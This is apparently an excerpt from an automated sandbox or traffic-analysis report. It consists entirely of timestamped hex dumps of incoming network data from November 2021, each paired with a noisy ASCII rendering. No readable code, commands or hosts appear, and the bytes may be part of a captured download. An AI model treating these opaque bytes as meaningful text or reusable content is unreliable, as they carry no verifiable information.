                                                                                                                                                                                2021-11-11 11:26:04 UTC955INData Raw: e8 5d c1 c6 b3 5d 21 e7 b7 b4 25 af 62 f6 f6 ab 27 d9 95 88 c1 26 af 51 5d 09 20 19 f6 65 a5 55 16 67 9d 74 49 48 6d 51 f1 53 4c e8 c2 ee 77 d9 b7 43 29 cf 90 c7 05 71 b9 19 ad c1 2d f1 6e 2d 4d 30 8b 21 58 f9 e4 5b b6 de 4a 20 25 01 c6 bf a8 7f d9 05 48 0e 98 da aa 32 8e d8 22 9e 57 c9 42 ae 7c b7 5b d8 21 fe 35 1e 13 63 69 0b 89 ef 57 1b 64 c2 d1 fc e8 51 ca 2a 28 8f 89 bd 71 61 a5 dd 39 3a c3 66 24 4f bf 39 76 61 bb 78 79 25 f1 fb 23 09 f7 01 c5 d9 27 09 47 d3 73 94 25 10 27 35 7e ce c2 f6 01 71 0d 49 89 48 76 16 52 f9 11 2d 57 89 0d fd 16 4f 97 5d 9c 94 2e 6c e7 cc 07 e9 67 5b 01 fb 0e 97 87 6c 55 9c a1 82 ff bf 50 b4 1c 26 51 4a 01 62 5b 22 01 b2 d5 0f c1 5d d8 28 79 70 0d 00 c2 44 fc a6 8c ce 6d 87 a0 f2 96 39 70 4e 00 f5 e6 26 e1 6f 06 57 30 1a 03
                                                                                                                                                                                Data Ascii: ]]!%b'&Q] eUgtIHmQSLwC)q-n-M0!X[J %H2"WB|[!5ciWdQ*(qa9:f$O9vaxy%#'Gs%'5~qIHvR-WO].lg[lUP&QJb["](ypDm9pN&oW0
                                                                                                                                                                                2021-11-11 11:26:04 UTC971INData Raw: f4 f9 1d b1 f1 37 4f e9 05 fd 87 0b 8c 7f 62 01 cd d7 32 eb d7 94 ca 5a 51 34 31 eb 9f dc 1b e9 67 a1 a8 1c 3f 07 b7 f6 b2 bc 2c da 08 43 1e a7 ff 00 ab 52 6c ae 4b f5 c1 bc c1 d7 2f 41 ae d4 7a ba dc 70 ad c0 00 52 1a 33 e4 0e ec 43 03 b2 0e 33 c2 9d 08 e6 c9 f2 ff 85 0c 29 fa 27 45 3c b0 e4 81 28 0d be 83 80 0a 47 a9 76 18 68 1d bb 1c fb 6f 98 66 01 71 bc 8c d0 9a de 10 c0 98 fd 70 0f c2 1c a3 6e ae 77 74 16 60 97 ab ed ff 08 65 9f da 23 20 0e 00 35 6a cb 4f f4 86 73 41 c0 b4 60 61 8d da 8e 18 90 78 7d 7c 0a 1c c4 98 b3 d6 80 c3 39 2e df 2a 01 e8 8a 2c 74 04 b0 4c 10 2d 00 fe 61 5e 8e a2 29 2b 20 4f fc 2b a6 2d 07 45 8a 3d 5f fc ed a2 06 d7 f3 3b cf c0 2f 2e d6 74 27 99 58 4b 75 61 55 4e 7c 86 dd 02 ec cf f7 1d 75 fe e5 5a 53 ee c4 06 74 62 63 1f c5 80
                                                                                                                                                                                Data Ascii: 7Ob2ZQ41g?,CRlK/AzpR3C3)'E<(Gvhofqpnwt`e# 5jOsA`ax}|9.*,tL-a^)+ O+-E=_;/.t'XKuaUN|uZStbc
                                                                                                                                                                                2021-11-11 11:26:04 UTC987INData Raw: f9 19 cb f7 1c 86 18 ee 8a 71 0a f3 0a 90 d1 90 5f f7 24 ff 36 4a 20 eb 76 3b a0 9c 29 e9 50 12 84 38 82 e1 47 cd a5 d5 95 cd 84 f1 8b 39 aa b7 46 9e 13 0b be 2c fa e7 00 da b3 92 a2 bd 18 76 ac 5d 0a c1 7f 4a e5 4e 3d f1 02 a3 39 1f c0 58 e7 51 00 04 fc 83 f8 89 8b 5d 0c 12 e9 b7 fa 16 7b 0f 64 ca 07 77 81 bf 12 ab d8 fc d1 10 bb 2d bd 08 2b 78 04 b7 4e 60 e9 d5 9f f0 d7 78 b1 ef e1 91 f7 c1 23 61 89 50 7c 42 02 a9 41 8a 60 1d db f5 31 02 2f 60 04 4a 8c 1c 31 9f 08 8a 02 f1 a3 6e d6 44 0b 7c 19 40 3d 72 f5 ff 5a 8d 24 4c 81 35 dc 96 80 f4 fa 89 4b 01 a1 e4 98 51 30 a9 c4 3c b4 30 67 13 48 73 3f 27 41 e0 46 0c 80 66 c2 5d 2f 70 02 68 87 17 21 44 ec 14 09 7c b3 0c 0b 5f b1 ea 5e c0 82 6e a0 ec 8c 4c 2e 6c 10 91 04 37 39 fb af b8 97 f3 15 0a 21 e9 9b 26 f4
                                                                                                                                                                                Data Ascii: q_$6J v;)P8G9F,v]JN=9XQ]{dw-+xN`x#aP|BA`1/`J1nD|@=rZ$L5KQ0<0gHs?'AFf]/ph!D|_^nL.l79!&
                                                                                                                                                                                2021-11-11 11:26:04 UTC1003INData Raw: 54 ad 95 50 24 09 76 5a c9 71 03 2f ff 0f 12 1c dd 95 00 5c 80 31 c0 8f 2b 00 3f 82 cc 7d 36 12 6d 8a 00 a4 e5 24 33 9a b2 19 e9 01 ff e0 50 13 25 1d 5e c4 97 f8 c7 c7 b0 01 60 ff b7 63 59 01 16 47 54 4e 93 f0 87 f1 e8 f6 7d d1 71 b3 78 6c 17 55 e2 4c d0 21 21 a0 3f b5 90 a9 6c 2b b5 a3 d3 1a e5 07 1c 5e 51 1e f0 7c 55 7a 95 f6 36 80 64 36 08 2c f5 f8 00 d5 8d 3e 1d 93 3c 4d c2 09 fb 49 9c 53 2a 44 78 40 b7 e7 5c 3a bd ca c7 92 93 f9 9d 12 55 49 57 50 02 45 e3 e1 43 90 b1 58 5f 68 a4 9b 58 f6 22 09 83 26 f6 56 c0 af d9 09 49 a9 45 5b f7 d7 3a 2c 49 8e 93 aa a7 58 60 44 ef c3 fd 77 bd 54 ba 20 08 a3 58 f1 04 57 22 b9 23 5f b2 19 10 d9 2f eb e5 be ca 96 e5 5b ee 2b a5 52 9f 95 9c 4f ae da 42 42 06 5a 2c 29 8b 99 1f 6b 4c 47 28 50 68 06 5c 58 eb 73 91 a9 88
                                                                                                                                                                                Data Ascii: TP$vZq/\1+?}6m$3P%^`cYGTN}qxlUL!!?l+^Q|Uz6d6,><MIS*Dx@\:UIWPECX_hX"&VIE[:,IX`DwT XW"#_/[+ROBBZ,)kLG(Ph\Xs
                                                                                                                                                                                2021-11-11 11:26:04 UTC1019INData Raw: 9c ad 5d 80 32 23 4a 44 74 3c 01 92 1c fd 9f e9 a0 0d 68 11 0e 37 08 17 1c be 01 cf 63 ff 38 8b 21 96 3c 35 fa 9f 63 d6 bb 2d 2b 79 a5 c9 1f f7 96 0c 0b b3 f6 76 4a d1 d0 42 01 19 7d 45 25 65 31 8b de 7a 96 e8 ed 14 3c ce a2 32 5c 1f 58 98 66 27 75 45 f4 bf 79 3f 1d 84 fa b3 a3 0e e8 d1 f2 e8 7d 3e 2d 97 94 2a b7 94 c0 40 33 c6 09 35 48 60 17 f5 79 ab 71 f0 66 83 22 20 f1 3e 49 bd e8 dc b1 52 45 e8 81 81 ea c4 50 01 d3 b8 2d 54 1d 99 ef 1a 8a 22 c1 f4 f8 f9 89 2f 24 39 52 37 09 f2 39 b1 61 57 2f 77 06 84 33 b8 12 a2 31 aa da 7d 02 df 63 42 9d 44 91 01 12 11 ec ff b7 9f 45 26 a5 c2 09 b2 fa 22 d6 78 00 04 ce 61 43 1e be 7a 81 01 b9 4c 9f 56 ab 2f 5e da 54 63 8c 09 45 8a a1 7b e9 84 4b 55 09 c0 e9 b7 5a 39 9f f2 a8 70 b2 b4 69 89 3e 42 00 9f a1 be 96 e0 25
                                                                                                                                                                                Data Ascii: ]2#JDt<h7c8!<5c-+yvJB}E%e1z<2\Xf'uEy?}>-*@35H`yqf" >IREP-T"/$9R79aW/w31}cBDE&"xaCzLV/^TcE{KUZ9pi>B%
                                                                                                                                                                                2021-11-11 11:26:04 UTC1035INData Raw: 0a 9d 96 69 2a f1 20 65 9c 14 15 e8 70 4b 85 76 ad 56 d3 09 cc 30 1c 28 93 4a 12 18 73 29 03 cd 34 94 bf 82 ac cf ff 31 e5 ee 24 33 c7 4a 1f ca e3 5e e8 97 f4 e3 80 4b b4 44 1c 9b 5f 16 ea eb 8a ba 6b 80 e5 1a 13 b8 ab f7 7d 51 67 92 d4 16 74 81 ac d3 c9 2d 57 94 e1 5b 31 c5 8d af b7 35 5c a2 97 e8 92 e1 33 16 58 ed 31 97 89 6c 74 c4 c2 c6 b8 57 94 ad a2 58 57 e5 b9 a5 98 52 09 cb 25 21 16 59 84 a5 44 fd 69 29 6f 73 9e 12 f7 af 2c 23 c6 5a 3b 72 dd be cc a2 97 02 cc cf b8 5c 37 52 75 7e d2 68 6e a7 40 f8 c7 1c b3 b6 92 4e e6 04 3d cf c5 40 9b a7 c7 38 49 3b 73 ca ee bb 73 5b 9a b1 05 2a 71 20 2d 04 6f 29 b9 6e 82 66 29 e1 fb ea d3 bd fc ab d7 ea 27 a8 d5 c7 e4 23 1c 9f 94 82 b1 69 16 cf cb 7f 3d 09 af 25 f1 a9 85 c2 ca 69 33 b9 35 87 5b 4e 09 24 25 28 65
                                                                                                                                                                                Data Ascii: i* epKvV0(Js)41$3J^KD_k}Qgt-W[15\3X1ltWXWR%!YDi)os,#Z;r\7Ru~hn@N=@8I;ss[*q -o)nf)'#i=%i35[N$%(e
                                                                                                                                                                                2021-11-11 11:26:04 UTC1051INData Raw: 87 d9 57 39 05 60 43 86 3a eb 98 3d e8 d9 24 4f 4c 61 00 d8 5b 01 e8 05 52 1d db f3 7d 68 22 50 5d b6 34 4e 8e fa 07 52 78 ae 62 77 49 40 f2 c7 ef 58 e9 8f 0e f1 f7 7d ca d7 ed 02 80 06 2f 6b 8d cf 6e 04 08 89 19 6b 4b f9 62 29 b5 76 3c c9 7d ce e4 93 a2 14 57 c3 88 5f 92 5c fb c9 50 6a b7 59 d1 da 24 53 09 82 2b be 77 5a 57 66 e0 09 cf 80 a6 2e 57 9c 92 a8 1e 68 08 13 01 79 3c aa f3 af b5 ab 94 4b ba 8c 4f 68 06 80 2d 8f 7d 5b 44 e8 ee 3b bf 3f 02 f3 bd 18 b8 87 a3 d4 2d 2e ca 69 43 de c2 05 8e 07 a0 40 03 f7 3a ff 31 20 55 c9 57 28 cd 1f 2f 9a 88 48 2c 09 94 40 cd 40 9a 0b e5 07 73 5f 95 f7 d0 31 c1 ed 05 80 1a e1 54 d9 7d 29 e8 94 4d 6f e1 32 4c 7f 1f 35 7e 07 07 c0 b4 4b ef 7e bb 83 28 69 00 43 a6 eb 7f 35 45 d5 7d e3 bb 6c bc 96 9f 3f 4f 00 dc 2c fd
                                                                                                                                                                                Data Ascii: W9`C:=$OLa[R}h"P]4NRxbwI@X}/knkKb)v<}W_\PjY$S+wZWf.Why<KOh-}[D;?-.iC@:1 UW(/H,@@s_1T})Mo2L5~K~(iC5E}l?O,
                                                                                                                                                                                2021-11-11 11:26:04 UTC1067INData Raw: 54 44 27 3b 63 77 b0 6b ba cb 00 f5 f7 27 81 f2 93 3c 7f e2 92 f2 d0 e7 20 00 a0 2d e7 a9 d6 0f 00 29 9b 95 7a 01 fa f0 ea a2 08 57 59 ca 43 d0 5a 05 60 f8 06 f7 7f ee f5 b5 81 16 a1 e4 fe 79 4a 83 48 56 d9 d7 3c bc c1 a6 0e 09 60 5f 21 3d f2 5e 58 10 0e 0f 02 30 84 29 ea c6 eb 4c 04 68 05 20 a7 6e aa cd 13 75 4c 6e cb 63 d2 ae d8 2b 89 46 e2 5a 98 c6 ca 4a 59 be 28 31 31 8a d5 45 b8 cc ab 9d 18 95 e5 31 15 68 38 17 3c ca 19 61 2f c4 07 c2 c7 58 85 c1 eb 02 e8 31 e9 3b b8 93 a3 6d 5b 35 90 ac ae 61 3f 4a 10 be 66 3b d2 72 42 1d ff 6c 01 a8 db 82 08 77 71 90 c9 31 ec 68 40 4f 5e 05 f7 02 a5 97 7e 01 f0 2d 89 07 55 14 b4 28 53 83 86 55 01 e7 6e b2 ab f0 5c e9 8b b2 32 97 c5 ef c0 68 48 0d 98 5a 10 cf 7e 5e fe 2f 00 4a a8 96 b5 a8 41 fd 3b fd d9 5e ef 2a 12
                                                                                                                                                                                Data Ascii: TD';cwk'< -)zWYCZ`yJHV<`_!=^X0)Lh nuLnc+FZJY(11E1h8<a/X1;m[5a?Jf;rBlwq1h@O^~-U(SUn\2hHZ~^/JA;^*
                                                                                                                                                                                2021-11-11 11:26:04 UTC1083INData Raw: dc 65 d1 62 6d 28 e8 fd 62 45 02 82 e3 f5 80 28 9d c9 f1 e9 48 eb a3 2e ad 63 03 48 c8 33 49 03 14 cf 11 d1 77 64 c8 04 df e1 00 39 17 3d 5e ae cc 73 d4 4c 70 56 79 00 bd 36 71 a4 2b 6c 04 56 3e 35 fb 09 d9 52 da f7 4f e6 12 30 a7 5f c4 03 31 f8 ef b5 b2 c7 81 b2 58 c8 55 6c 55 f2 be d5 cf 00 b8 af b9 17 b4 9e 66 52 0e eb 3d 2a 2e b6 ea 4e ac b7 b4 f2 80 83 4e 14 a9 85 b2 ff 97 c2 79 ee fb 34 b5 90 eb f7 10 20 36 18 f6 60 19 0a f2 b6 4b 1b b8 98 d8 ba 0f af 3a ca 89 cc 65 a5 a0 57 36 bf cf fc bc cf ca cf 7c c1 26 57 0a 22 2c 4a dc 4e ce eb 09 ce 8b 06 d7 3e 9b 95 96 31 09 01 37 ff e0 7f 15 f0 ad e5 97 09 33 0a 45 9b 13 0e af 7b 8f 23 6d 81 e9 fc d1 32 55 2b 2c 9a 0f b5 5e 4f f0 0f b6 4b 32 e9 0b e5 ea a2 b5 d4 30 a0 23 cf 36 27 b8 7e 94 ef 9f fc 4d e2 21
                                                                                                                                                                                Data Ascii: ebm(bE(H.cH3Iwd9=^sLpVy6q+lV>5RO0_1XUlUfR=*.NNy4 6`K:eW6|&W",JN>173E{#m2U+,^OK20#6'~M!
                                                                                                                                                                                2021-11-11 11:26:04 UTC1099INData Raw: cc ea b2 2d cd b0 ad 1c d9 21 21 08 60 2a 4b 44 85 5a 0c f8 41 e2 b8 6e 4c 3e f1 bc 13 4d 3d 8a da 2d 08 c5 d7 cb fd 65 00 27 18 88 03 18 b5 74 cf 54 3c 9f 37 2f 6d f5 95 fe 11 21 5a ce 0e 4a 27 cb e0 ef 08 28 3e 4a 20 b8 d6 c4 55 4c 22 29 57 54 96 69 6c c5 22 c6 62 9f fb e3 13 36 eb f2 bc c8 33 01 e9 1f 12 3e 71 6e f2 c9 f0 ce 8b 1e b9 89 53 c2 37 7d d9 5f 65 e3 ad 1c b4 f8 6c 5a 8f 4c 29 94 09 27 b9 0e 16 68 5f b0 cd 13 94 4a 05 f3 ee 88 a1 e0 ea 27 59 9c 4a 41 aa db 4d 4d da b2 b6 f3 32 c5 0b b8 67 f2 03 f1 32 60 7a 3b f2 0a b5 5b 0f 92 29 e2 c5 9e 60 b7 5b 26 96 ea 89 52 6a b7 bb 63 10 d1 c8 e2 59 d1 60 3c db f9 8f b2 d3 ff f9 d5 f1 0a c3 84 28 ba e1 7c 66 a9 6c 00 e8 0a 85 27 dd 16 6e 95 dd 3c f7 9f de 95 72 dc a2 52 dc 9c 74 4a 03 ca 86 8b 19 67 f7
                                                                                                                                                                                Data Ascii: -!!`*KDZAnL>M=-e'tT<7/m!ZJ'(>J UL")WTil"b63>qnS7}_elZL)'h_J'YJAMM2g2`z;[)`[&RjcY`<(|fl'n<rRtJg
                                                                                                                                                                                2021-11-11 11:26:04 UTC1115INData Raw: 1e b5 eb 8e df 13 68 f1 0d 35 15 e9 2a fe 28 66 5f ac 46 bd d4 56 7a 09 e2 57 7b dc 8b dd 5b 98 a6 fe f3 81 98 c0 ce c4 12 5d b9 e0 ee b3 ee f0 2c c5 c6 fa f6 87 e0 1c 53 36 fb d2 a0 05 b4 2b 96 ff 90 25 e0 78 99 6d b5 90 1c d4 c2 27 88 64 9d 24 f5 62 5c a9 8d a5 57 97 2f a5 7f 1c 9d 52 51 27 50 52 ae 00 8e db 7f 81 ca 6d 1f 07 1d 3c c1 ea 3c 80 e2 10 3d df 67 f7 d2 03 53 bb b5 8b ff 2d f0 cb 1c 52 ec 6f 2e c1 e3 5b 00 c3 03 67 79 7f 09 24 da 5b 4e 06 f0 31 99 82 27 d6 5a 55 e7 6a 25 f6 f9 82 50 39 69 0b 77 b1 8f 83 06 d5 71 55 a4 fb 09 29 e3 0e 7f 57 47 73 c9 7d 15 56 af 74 63 e9 16 de 80 87 fa f2 28 a3 7f 81 40 07 0b 1d 24 df 6e 81 f3 0f a1 d8 40 3f c5 90 14 ce 90 e4 af f8 23 dd 01 be 3f 66 96 6d e4 f5 5e 02 45 c1 e5 02 f7 d5 87 f6 fb f2 a6 49 60 90 96
                                                                                                                                                                                Data Ascii: h5*(f_FVzW{[],S6+%xm'd$b\W/RQ'PRm<<=gS-Ro.[gy$[N1'ZUj%P9iwqU)WGs}Vtc(@$n@?#?fm^EI`
                                                                                                                                                                                2021-11-11 11:26:04 UTC1131INData Raw: 4b 59 fa 9e dd 5a b9 65 88 eb 12 1c aa e3 a2 3d 54 db b7 47 9c 2b 01 5d 7f f2 f5 53 be 49 7f ba 5f de c4 2d f7 34 24 95 f9 33 c9 ff 64 24 bf 09 f5 ff c7 5d 25 f5 94 27 c1 76 52 68 61 72 c1 23 2b 90 08 0c 2b e5 5e 4c ae 66 fd 6b 30 56 55 0b bb 45 6a 78 48 b7 7c 85 f2 57 71 30 82 d8 88 79 5e 92 2b fc 01 27 55 15 8d ad ff 17 e6 af 43 ec 05 77 1a 72 d5 2d fc 85 c1 e9 f1 11 30 3a ae 68 df 52 4b 54 af 34 3f ff cb a5 c6 5c 57 d9 04 68 c3 a7 4e 1b aa 8a d8 5f f8 3c 00 57 bf 2b 9e 3a 6d 29 97 d0 27 03 e9 5d 68 33 ed 9c c6 b9 1d b8 ec 1f 38 17 29 c1 e1 aa 2b b3 7e b6 2c 4a 34 b8 d0 ac 56 08 be 1a 1e 7f 08 f5 5e 31 17 bb f7 e1 4e cd d6 9d ba d1 00 dd 3a 81 e7 ee aa 3b 36 7c 03 cf f8 88 76 77 0e 0c dc 7f af ff 03 ef 57 55 d6 c6 18 ee aa 20 ff 2f 09 e8 bb 0f d4 f7 0a
                                                                                                                                                                                Data Ascii: KYZe=TG+]SI_-4$3d$]%'vRhar#++^Lfk0VUEjxH|Wq0y^+'UCwr-0:hRKT4?\WhN_<W+:m)']h38)+~,J4V^1N:;6|vwWU /
                                                                                                                                                                                2021-11-11 11:26:04 UTC1147INData Raw: 8f 7c f1 50 35 bb 26 49 00 a6 5c 18 56 68 e5 5a c4 31 11 ea 40 16 2f 8c 9c 4b f3 38 37 05 04 9d 3d 07 ec b4 46 49 0d 0a a8 7f e6 80 60 b0 26 12 e8 5e 8b 88 ba 0b 18 6c ad db 90 ce 36 09 e0 ff 52 fd 68 7a 68 af 69 fe f0 60 fc dd 7d b6 f0 8e bc 52 cd f2 c4 89 10 cd 97 e6 5e 28 95 61 ba 30 74 04 4c cd 28 20 4b 54 fb c8 86 3c 06 a6 fd 2c 6b 2f 18 33 50 31 70 37 d7 40 1b ed d4 fc 06 ef dc 6b e9 ac 37 9d dc 1c f2 75 da 3e 5c 51 9a a9 62 0e c0 68 12 d7 70 37 90 85 97 db cc 71 5e 92 13 50 fa 3d 07 7b 8a 16 40 1f 52 e2 ba 1c f5 b2 7d 65 7d c6 fb 9d b2 e6 04 2f 53 d4 5c 29 76 62 e7 b5 31 b6 6a ff dd 53 a7 0f 47 a8 69 57 3c 61 4e 51 ee 2f 06 25 56 64 8d 08 4d dc 6f 29 68 7d 25 5c 7a 4e a3 e2 3d fe 73 0a a2 2f 5f d3 f2 6b 7d c5 85 01 68 4c 3b 11 7b 2b b7 00 93 ab 8f
                                                                                                                                                                                Data Ascii: |P5&I\VhZ1@/K87=FI`&^l6Rhzhi`}R^(a0tL( KT<,k/3P1p7@k7u>\Qbhp7q^P={@R}e}/S\)vb1jSGiW<aNQ/%VdMo)h}%\zN=s/_k}hL;{+
                                                                                                                                                                                2021-11-11 11:26:04 UTC1163INData Raw: 35 8f e1 e3 30 1d 75 72 2a c0 ae 8e 1b 9d 99 4c 28 05 ce a2 ec e7 74 f7 c9 ad bc 90 ce 03 a1 80 56 b8 0a ca 8e 6a 21 ac 0b f2 cf a0 56 5c 8a d6 47 50 87 68 b7 52 19 b2 5e 90 bb 6a 51 a6 4b 4f 91 00 50 96 29 0e 13 91 77 f9 97 0c 07 d5 09 08 01 35 fb 24 9c 20 08 51 d1 7d 63 c3 5c 12 25 3c 1c 95 e0 94 b6 2e 28 40 c7 60 ef f0 b0 4a 0d bb 78 0e 17 c8 d5 0a 04 52 45 81 7a 7e 0b 7b b3 44 00 35 9b b7 3a 98 a9 0f 0a 85 19 d0 ed b2 0c 6d b6 52 5a 24 79 08 52 4f 8c f0 fc 96 7f a5 9f 10 ee 39 01 00 8e b5 4d 80 97 b4 e6 16 d2 20 eb 35 79 ef 8b d7 27 ea 5e e0 d9 89 2f 8d 1e 69 05 00 60 c2 dd 7f c1 ed 05 02 81 c5 f1 11 01 fc 57 07 93 83 39 67 af 25 4b d3 98 12 74 49 ba 77 2f 54 5f f9 30 e4 29 34 e9 c8 25 53 5d 4d 48 10 29 4a ab 8b 07 21 34 27 e2 8b 77 30 d5 9c 47 29 30
                                                                                                                                                                                Data Ascii: 50ur*L(tVj!V\GPhR^jQKOP)w5$ Q}c\%<.(@`JxREz~{D5:mRZ$yRO9M 5y'^/i`W9g%KtIw/T_0)4%S]MH)J!4'w0G)0
                                                                                                                                                                                2021-11-11 11:26:04 UTC1179INData Raw: d0 96 59 de 00 97 cd 18 3f 4e 3b 10 32 03 52 51 70 60 4a 7b d0 d2 7f e1 f0 ec 0f 61 d3 bf d0 40 95 72 4d ac 92 73 02 00 c9 cb dc ad 12 ed e2 51 00 da 47 fc 09 08 9c e7 7d 00 4c 28 62 16 c3 f6 ed 34 01 42 e4 c1 30 38 40 2f d8 fa c2 ac 70 3b 9d ec 80 81 07 97 18 aa d6 31 00 7b d0 e3 b8 a1 be da 9f e6 a3 ea cc 00 1f 95 e7 11 ef 46 39 c2 01 d2 06 af 6f 5e f4 d4 ec c5 d1 00 6b 41 9e 50 81 96 ba b4 0e e0 63 c0 ad 40 05 f4 57 43 99 00 75 89 09 3e 19 0b 18 48 00 78 44 a0 5e 5b 08 e8 0c 1e 1d 3b 7f 00 a8 ef de fc db e6 0e 32 3e 49 b3 60 4b b0 da 89 c6 3e 63 06 00 d3 44 01 fb 76 5d 75 00 39 d7 08 9b cd df 23 56 71 1c 7f 27 00 60 4e f9 c8 e0 62 a5 0e 00 93 08 10 47 a4 36 3f f1 30 8c d3 7c 7a b9 5a 98 61 00 d7 e0 71 20 b5 5e 9a 8b 00 d8 be a6 a2 26 43 a5 59 00 6b e0
                                                                                                                                                                                Data Ascii: Y?N;2RQp`J{a@rMsQG}L(b4B08@/p;1{F9o^kAPc@WCu>HxD^[;2>I`K>cDv]u9#Vq'`NbG6?0|zZaq ^&CYk
                                                                                                                                                                                2021-11-11 11:26:04 UTC1187INData Raw: 9c 00 55 20 83 ce e5 d3 d2 00 30 45 6e 8a 19 d8 92 50 03 aa 76 25 62 7b c7 98 0a ab d3 12 61 36 e2 ff 00 a1 28 8b 72 87 12 7b 30 00 49 45 ca 0e a0 f2 29 3e 00 c3 08 67 1d c5 e5 48 84 00 1f 59 56 0a 60 df 81 01 00 28 05 37 4a 36 77 6b 76 00 63 b3 41 87 96 aa 65 a7 00 91 e3 7c e4 c8 38 1b 59 00 24 99 1d 90 d6 f5 ed 74 00 a2 48 43 ea 7a 6c 2f a0 01 78 26 6e b9 b8 b3 12 c8 56 63 00 57 97 85 48 1f a1 43 9e 00 fa 78 ad 70 8a d4 14 bf 72 c7 7e 6e 00 92 9d c0 37 d7 39 0d bb 79 30 38 0a ed 00 d3 52 b1 e7 61 25 6b 03 bd ae 32 0b 01 62 e0 6c cc 77 75 c9 02 2b a8 25 b8 f6 9f e0 c1 08 ae 39 58 ce 3d e6 80 d0 c9 6e 0c 6c 64 fd 00 3a 13 24 d9 c5 98 02 89 00 01 2e ce cc f7 36 e5 e9 00 73 7a c0 ae 7f 72 d0 65 3a 6d 6c 1c 84 ce 80 63 8a f3 55 d9 3d 00 18 e3 3b f0 a6 34 36
                                                                                                                                                                                Data Ascii: U 0EnPv%b{a6(r{0IE)>gHYV`(7J6wkvcAe|8Y$tHCzl/x&nVcWHCxpr~n79y08Ra%k2blwu+%9X=nld:$.6szre:mlcU=;46
                                                                                                                                                                                2021-11-11 11:26:04 UTC1203INData Raw: 3b 23 c1 4f 84 69 94 46 00 11 b0 dd 39 2b 88 44 a2 00 77 9e e0 48 9b 87 37 1f 00 42 e8 07 47 fd 0d 0e 4e 00 b1 29 f1 5b 55 e1 fe 04 01 fb 72 a2 57 43 5f 7e 60 a0 12 00 3b c2 2f 42 14 64 7d bc 00 7a e9 27 f0 f5 32 3f fb 00 36 16 92 da c5 d0 bb f2 00 48 7f fd 5b ad 03 6e 7b 00 dc e2 57 af 9a 41 21 ed 00 5c 1b 80 ec a7 b5 72 56 00 a0 55 61 fc 64 6f 18 5f 00 ba 4a 60 4d a7 9f 54 3c 77 21 7a 53 00 d5 10 f2 c1 8f d1 02 c6 00 b2 9e 31 27 37 7f b6 ca ea f8 00 82 69 7e 6b 8f 11 c0 2e e4 6c 00 33 f0 a0 dd fb 85 2c 9e 00 7e ae 09 f8 e1 30 1a 2b 00 40 55 cc 23 fd ed 59 d0 00 b9 3b be 21 1d 18 f2 c9 00 e0 ee b8 26 dd 6a f0 1f 00 39 d5 da 66 a3 5f 78 70 39 53 28 f2 fc 92 28 30 90 fd 00 dc ce 31 43 95 11 79 38 01 77 5e aa c7 e5 7d 32 ec ee ff 00 6a fb a6 6f 03 83 e1 4a
                                                                                                                                                                                Data Ascii: ;#OiF9+DwH7BGN)[UrWC_~`;/Bd}z'2?6H[n{WA!\rVUado_J`MT<w!zS1'7i~k.l3,~0+@U#Y;!&j9f_xp9S((01Cy8w^}2joJ
                                                                                                                                                                                2021-11-11 11:26:04 UTC1211INData Raw: 02 10 bd e4 7c 64 00 ad 32 4c b3 0d e0 54 5a 1e aa 96 6e 80 6c 51 fc 8f 33 a0 00 44 9b d9 cb 78 67 5a 91 01 db 13 68 bd 3e ed c7 d5 71 cc 55 4a 00 07 3f ad cf 7c 8d b5 6e 1f 9b ac 7e c0 5a 96 19 49 1a be f2 b2 00 84 08 01 79 e8 21 b3 03 07 8b a4 88 6f 76 ae 40 7b 49 e4 ba 06 01 dc ce b8 cf 89 6d 5f fc 59 24 3d df a9 81 d6 c9 41 69 3e 42 60 fd 2a 00 08 c0 fa 5d 34 a6 19 ef 3d e8 6b 00 2f ea c5 88 44 10 9d 3b d5 36 00 7d 0f 95 e7 59 71 d9 1f a9 c5 c8 80 2c cb 0a 78 68 4e 00 b3 36 97 a4 a5 8b 50 2b 7e c8 3e 91 59 00 3e 72 da 4c ca c4 1c 03 a1 6f 4f 05 0a 2d 80 e1 1d a5 01 32 6b a7 b4 79 b3 c9 dc dd be 3e 9d 5b dc c6 1f db 38 c0 6b 73 44 7e 8e aa 00 ae 25 06 60 9f 71 4b 1e 01 91 a3 f8 d9 d7 20 52 e0 cb a6 00 c0 3d 3b 0d 88 9e 7c 53 f8 d0 00 63 7a 02 68 c5 10
                                                                                                                                                                                Data Ascii: |d2LTZnlQ3DxgZh>qUJ?|n~ZIy!ov@{Im_Y$=Ai>B`*]4=k/D;6}Yq,xhN6P+~>Y>rLoO-2ky>[8ksD~%`qK R=;|Sczh
                                                                                                                                                                                2021-11-11 11:26:04 UTC1227INData Raw: 86 00 56 e7 1d 27 12 fb 2d 01 1f cb c4 02 4f 6a f1 c0 77 c5 16 d1 f4 07 b8 b6 52 69 a5 40 17 9a 23 0f 00 e5 54 12 3f 4d 18 84 f4 00 52 91 5e ba 5a 38 b4 35 3b c8 b9 80 1a ee 13 7b c4 29 48 00 85 97 a7 c3 f3 c6 45 a3 0e 1d ec 14 39 47 13 88 4f 8e d8 07 b0 82 20 4a f6 11 62 01 b3 bf d1 c3 63 6b 38 f4 7a 89 00 ae 6d 24 90 27 0a 55 d0 00 eb a7 94 91 e3 69 84 c9 07 4f fc 2b be 5e a0 48 0f 17 0b 00 53 8e 92 9e 1a ec 24 d9 00 4a 41 63 0c b5 9d 3f e2 00 c9 27 dc eb 80 7e f3 45 03 77 47 08 54 c3 2a 99 3c 5f c4 dc b1 01 0e 26 28 a2 60 35 5e f0 bd 09 02 19 bf 3b 0d 50 5a 80 ea 3d d1 2e ad 00 b8 75 c0 db 56 61 6c 5e 07 43 ee a3 a4 88 a0 53 34 48 f1 00 ae af e9 f4 62 da b2 56 3c 2d 24 a6 4b 5e 00 f2 f7 13 fb 53 73 00 88 84 ef fa ca b6 a3 cd f0 74 7d 5e 00 d1 97 54 48
                                                                                                                                                                                Data Ascii: V'-OjwRi@#T?MR^Z85;{)HE9GO Jbck8zm$'UiO+^HS$JAc?'~EwGT*<_&(`5^;PZ=.uVal^CS4HbV<-$K^Sst}^TH
